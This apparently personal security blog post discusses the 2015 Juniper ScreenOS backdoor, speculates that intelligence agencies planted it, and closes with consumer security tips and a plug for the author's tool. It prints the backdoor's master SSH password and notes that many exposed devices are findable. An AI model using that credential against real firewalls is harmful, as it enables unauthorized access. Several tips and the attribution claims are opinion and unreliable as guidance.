The worst thing happened

ns-image2What is the worst thing to happen with regards to network security you can imagine?

How about a network device that should care for your network security which has a back-door that allows access by everyone from everywhere? Yes, that’s scary, right?

Exactly this has happened to Juniper users – and we all are affected.

For your information, Juniper is the second largest company selling Routers, Switches, Firewalls and other network products after Cisco. Their products are widely used from small businesses, large companies, Network providers to governmental networks.

Recently Juniper indicated that they had discovered unauthorized code in their ScreenOS software used in their Netscreen firewalls. It turned out that this code contains two back-doors which allows full device access and VPN traffic monitoring. Further investigations revealed that all of their firewalls running software versions shipped from 2013 until recently can be accessed from everywhere by everyone via SSH using any username and password “<<< %s(un=’%s’) = %u”. An update will fix this issue.

So far, it is unknown how this backdoor slipped into their code.

Currently, Morpheus and Shodan finds more the 30.000 of these devices.

Maybe you personally don’t use Juniper hardware but be assured, your Provider, Bank, online Store, Company you are working for may likely use Juniper hardware.

It was good that Juniper offensively informed about their findings so that security researchers were able to start their own investigations. However, it took two years to find the back-doors. My personal assumption is, that organizations like NSA, GCHQ, Asian or Russian organizations are responsible for this and moreover, I further assume that similar Back-doors are available in other Network Devices such as those from Cisco and other “big Players”.

I even now see the other Back-doors I mentioned in my blog (here and here) from a different perspective. Not unlikely that these back-doors were not results of brain-dead developers but have the same source.

Regardless whether my assumptions are correct, many networks are currently at high risk. Even more because not only NSA, GHCQ etc. are able to access our data, now even inexperienced criminals can.

Due to the impact of this issue, there is not much one can do other than to follow following rules that make sense regardless of this impact:

  • Think twice if you have to give out personal information such as Name, Address, Email Address and payment information. Better enter it for every single transaction rather than let your online shop conveniently store it
  • Use strong passwords and change your passwords regularly
  • Never use one and the same password for different services
  • Never use one service to log into another service (e.g. don’t use “Login with Facebook” for Netflix)
  • If possible, create some fake accounts and fake identities and use them instead of your real accounts where possible
  • Leave Yahoo. If you still have A Yahoo account, close it. Not unlikely that Yahoo will be sold soon so your information might end up somewhere else
  • Better don’t use a public WiFi network without VPN. Rather use your Cell network (3G/4G/LTE) when security is important
  • Use Firefox instead of Internet Explorer
  • Use Ove’s Self-Destructing Cookies plugin or similar in your browser
  • Setup your mail clients to use encrypted passwords and SSL/TLS
  • Better don’t use Web-Mail clients (except for your fake accounts)
  • Never ever use Android devices
  • Never ever use Windows XP anymore
  • Always install updates (for Software and Hardware)
  • Always change default passwords
  • And of course, consider NetworkToolbox to check for security issues

Of course, there is much more we can do but most of the above is either easy to do or simply mandatory and without alternative.

Regardless, I wish you and your families a Merry Christmas and all the Best and secure 2016!

Marcus